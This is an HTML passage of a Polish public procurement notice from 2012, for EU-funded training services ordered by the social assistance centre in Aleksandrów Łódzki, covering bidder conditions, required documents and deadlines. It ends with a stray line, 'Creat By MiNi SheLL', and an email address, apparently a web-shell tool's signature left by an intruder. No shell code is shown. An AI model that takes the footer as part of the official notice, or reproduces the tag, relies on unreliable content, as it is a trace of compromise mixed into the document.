<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek określony w art. 22 ust 1 pkt. 1 ustawy PZP, dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.  Zamawiający uzna powyższy warunek za spełniony, jeżeli - Wykonawca wykaże,  że jest wpisany do rejestru instytucji szkolących Wojewódzkiego Urzędu Pracy a Wykonawcy ubiegający się o udzielenie Części III zamówienia dodatkowo wykażą, że posiadają status Centrum Integracji Społecznej ( CIS) nadany przez wojewodę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzyspełniają warunek określony w art.22 ust.1 pkt.2 ustawy PZP dotyczący posiadania wiedzy i doświadczenia. Zamawiający uzna powyższy warunek za spełniony, jeżeli: - Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych, również wykonuje dwie usługi polegające na zorganizowaniu i przeprowadzeniu szkoleń o tematyce zgodnej z opisem tej części przedmiotu zamówienia o którą Wykonawca się ubiega;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzyspełnia warunek określony w art. 22 ust.1 pkt 3 ustawy PZP dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca zamieści w ofercie wykaz narzędzi potrzebnych do realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek określony w art. 22 ust.1 pkt 3 ustawy PZP dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca zamieści w ofercie wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia. Dla części III zamówienia powyższy warunek zostanie spełniony jeżeli Wykonawca wykaże, że wskazana kadra spełni wymagania dla określonego w zamówieniu programie działań aktywizacyjnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek określony w art.22 ust.1 pkt 4 ustawy PZP, dotyczący sytuacji  ekonomicznej i finansowej. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca przedstawi opłaconą polisę OC w zakresie prowadzonej działalności, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aleksandrówlodzki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej 95-070 Aleksandrów Łódzki ul. Piotrkowska 4/6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2012 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej 95-070 Aleksandrów Łódzki ul. Piotrkowska 4/6 - sekretariat p.3 piętro I.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie przeznaczone jest dla uczestników projektu systemowego Nowe perspektywy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com